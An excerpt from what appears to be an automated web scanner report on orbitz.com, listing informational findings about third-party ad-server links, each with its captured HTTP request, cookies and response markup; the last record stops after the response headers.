<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=125x125_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgLeftAd=true&aapd=true&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=125x125_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgLeftAd=true&aapd=true&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=125x125_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgLeftAd=true&aapd=true&" height="125" width="125" border="0"></a>
...[SNIP]...
<div class="aphXSell">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=125x125_bottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=125x125_bottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=125x125_bottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&" height="125" width="125" border="0"></a>
...[SNIP]...
<div class="ad" id="ad149x65">
<iframe allowtransparency="true" height="65" width="149" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=air&Section=results&adsize=149x65&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=149x65&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=149x65&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=149x65&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&" height="65" width="149" border="0"></a>
...[SNIP]...
<div class="ad" id="adhotwireBottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=hotwireBottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=175&width=125&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=hotwireBottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=175&width=125&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=hotwireBottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=175&width=125&adType=noframe&" height="175" width="125" border="0"></a>
...[SNIP]...
<div class="ad" id="ad160x600">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=160x600&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=120&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=160x600&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=120&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=160x600&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=120&adType=noframe&" height="600" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad160x600_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=160x600_right&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=160&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=160x600_right&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=160&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=160x600_right&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=160&adType=noframe&" height="600" width="160" border="0"></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&" height="55" width="120" border="0"></a></noscript> <a class="eaEnabled" rel="nofollow" href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101&popupsDisabled=true" target="_blank" onClick="return popUpGen('http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101&popupsDisabled=true');" > <img src="/site/img/logos/truste.gif" width="128" height="35" border="0" alt="TRUSTe" />
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&" height="1" width="1" border="0"></a>
...[SNIP]...

19.225. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=2 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598401966:ss=1317596806325; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 877
Date: Mon, 03 Oct 2011 00:33:55 GMT
Cache-Control: private
Content-Length: 877

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81438&AdID=270694&TargetID=37184&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14862,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37184,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66788,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dvegasvacation%26cnt%3DPKH%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/ORB_cs_LasVegas-LastMinute_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

19.226. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=3 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 905
Date: Mon, 03 Oct 2011 00:07:28 GMT
Cache-Control: private
Content-Length: 905

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=115231&AdID=275752&TargetID=37183&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14863,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37183,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66789,66797,67440,68027,68271,68362,68366,68375,96177,103024,103054,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Deco-vacations%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_Eco35-PR_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

19.227. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=3 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598401966:ss=1317596806325; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 892
Date: Mon, 03 Oct 2011 00:34:00 GMT
Cache-Control: private
Content-Length: 892

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=115231&AdID=275752&TargetID=37183&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14863,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37183,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66789,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Deco-vacations%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_Eco35-PR_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

19.228. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598401966:ss=1317596806325; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 896
Date: Mon, 03 Oct 2011 00:33:55 GMT
Cache-Control: private
Content-Length: 896

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=273149&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37186,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66787,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_FallHotelSale-40_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

19.229. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598509204:ss=1317596806325; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 1009
Date: Mon, 03 Oct 2011 00:35:50 GMT
Cache-Control: private
Content-Length: 1009

